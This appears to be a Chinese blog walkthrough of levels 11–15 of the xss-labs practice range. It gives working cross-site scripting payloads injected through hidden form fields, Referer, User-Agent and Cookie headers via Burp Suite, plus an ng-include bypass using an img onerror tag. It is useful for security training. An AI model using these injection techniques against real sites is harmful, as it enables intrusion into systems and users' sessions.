第十一关(referer)
直接查看网页源代码,发现四个input被隐藏,不难看出,第四个名为t_ref的<input>标签是http头referer的参数(就是由啥地址转跳到这里的,http头的referer会记录有)
通过构造payload,配合burpsuite抓包可以得到
?keyword=&t_link" type='text'>//&t_history" type='text'>//&t_sort=" type='text'>//&t_ref=" type='text'>//
通过Burpsuite抓包,发现传参点依旧在t_sort并且发现没有referer的值,手动添加referer,payload是第十关的payload,成功绕过!
referer:&t_sort=" type='text' onclick=javascript:alert(1)>//
第十二关(uagent)
随便输入一个值,查看网页源代码,发现跟上一关差不多,只是t_ref变成了t_ua
还是像上一关一样,构造payload,配合burp抓包,再放包
?keyword=&t_link" type='text'>//&t_history" type='text'>//&t_sort=" type='text'>//&t_ua=" type='text'>//
本关通过User-Agent传值,于是修改User-Agent信息里添加onclick事件 即可绕过
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 "type="text" onclick=javascript:alert(1)//
十三关(cookie)
查看网页原代码,发现变成了t_cook,猜测在cookie中进行传参
通过配合burp抓包得到下图
构造payload,再放包即可
Cookie: user=" type='text' onclick=javascript:alert(1)//
第十四关
查看源代码,看了其他博主的,都说网站挂了,不能演示,具体知识点请看此位xss-labs靶场-第十四关 iframe和exif xss漏洞 - FreeBuf网络安全行业门户
第十五关(ng-include文件包涵)
查看网页源代码,发现了一个新东西ng-include,去查一下用法:ng-include指令用于包含外部的 HTML 文件。意思是可以打开外部的网页文件。ng-include详情请看他:AngularJS ng-include 指令 | 菜鸟教程 (runoob.com)
那就是说,如果输入第一关的路径,就可以跳转到第一关,输入第一关的过关信息即可成功,尝试一下,自己输入<script>alert(11)</script> 发现<>被转义了,但是用<img>标签可以成功绕过
构造payload
?src='level1.php?name=<img src=1 onerror=alert(1)>'
